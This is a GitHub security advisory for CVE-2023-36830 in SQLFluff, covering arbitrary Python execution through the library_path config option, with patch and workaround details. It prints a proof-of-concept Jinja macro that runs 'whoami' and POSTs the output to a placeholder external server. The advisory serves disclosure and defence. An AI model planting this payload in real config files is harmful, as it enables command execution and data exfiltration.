Skip to content

SQLFluff users with access to config file, using `libary_path` may call arbitrary python code

Moderate severity GitHub Reviewed Published Jul 6, 2023 in sqlfluff/sqlfluff • Updated Nov 10, 2023

Package

pip sqlfluff (pip)

Affected versions

< 2.1.2

Patched versions

2.1.2

Description

Impact

In environments where untrusted users have access to the config files (e.g. .sqlfluff), there is a potential security vulnerability where those users could use the library_path config value to allow arbitrary python code to be executed via macros. Jinja macros are executed within a sandboxed environment but the following example shows how an external url might be called and used to reveal internal information to an external listener:

[sqlfluff:templater:jinja]
library_path = /usr/lib/python3.9/http

[sqlfluff:templater:jinja:macros]
a_macro_def = {{client.HTTPSConnection('<SOME_EXTERNAL_SERVER_YOU_CONTROL>').request('POST', '/', server.os.popen('whoami').read())}}

For many users who use SQLFluff in the context of an environment where all users already have fairly escalated privileges, this may not be an issue - however in larger user bases, or where SQLFluff is bundled into another tool where developers still wish to give users access to supply their on rule configuration, this may be an issue.

Patches

The 2.1.2 release offers the ability for the library_path argument to be overwritten on the command line by using the --library-path option. This overrides any values provided in the config files and effectively prevents this route of attack for users which have access to the config file, but not to the scripts which call the SQLFluff CLI directly. A similar option is provided for the Python API, where users also have a greater ability to further customise or override configuration as necessary.

Unless library_path is explicitly required, we recommend using the option --library-path none when invoking SQLFluff which will disable the library-path option entirely regardless of the options set in the configuration file or via inline config directives.

Workarounds

Limiting access to - or otherwise validating configuration files before they are ingested by SQLFluff will provide a similar effect and does not require upgrade.

Credit

Dan Amodio from the Tinder Red Team

References

@alanmcruickshank alanmcruickshank published to sqlfluff/sqlfluff Jul 6, 2023
Published by the National Vulnerability Database Jul 6, 2023
Published to the GitHub Advisory Database Jul 6, 2023
Reviewed Jul 6, 2023
Last updated Nov 10, 2023

Severity

Moderate
6.3
/ 10

CVSS base metrics

Attack vector
Local
Attack complexity
Low
Privileges required
Low
User interaction
None
Scope
Changed
Confidentiality
Low
Integrity
Low
Availability
Low
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L

Weaknesses

CVE ID

CVE-2023-36830

GHSA ID

GHSA-jqhc-m2j3-fjrx

Source code

Checking history
See something to contribute? Suggest improvements for this vulnerability.